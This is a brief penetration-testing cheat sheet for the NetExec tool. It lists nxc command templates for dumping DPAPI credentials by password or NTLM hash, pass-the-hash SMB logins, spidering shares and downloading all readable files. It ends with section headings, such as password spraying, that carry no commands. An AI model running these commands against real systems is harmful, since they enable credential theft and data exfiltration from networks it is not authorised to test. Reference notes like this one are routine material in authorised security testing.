NetExec

URL to tool: https://github.com/Pennyw0rth/NetExec

Dump credentials

# DPAPI with a password (add --local-auth if needed)
nxc smb '<TARGET-IP>' -u '<USERNAME>' -p '<PASSWORD>' --dpapi

# DPAPI with a hash (add --local-auth if needed)
nxc smb '<TARGET-IP>' -u '<USERNAME>' -H :'<NTLM-HASH>' --dpapi

SMB shares

# Login with a password
nxc smb hosts.txt -u <username> -p <password> --shares

# Login with a hash
nxc smb hosts.txt -u <username> -H <ntlm>:<ntlm>

# List all readable files
nxc smb <target> -u <username> -p <password> -M spider_plus

# Search for files with a certain string
nxc smb <target> -u <username> -p <password> --spider C\$ --pattern <string>

# Dump all files
nxc smb <target> -u <username> -p <password> -M spider_plus -o DOWNLOAD_FLAG=True

Get domain password policy

NULL session and guest logon

Password spray

Enumerate hosts with SMB signing off

Enumerate RDP NLA

Check if RDP login is allowed

Check group memberships

Get user description fields

Change expired password
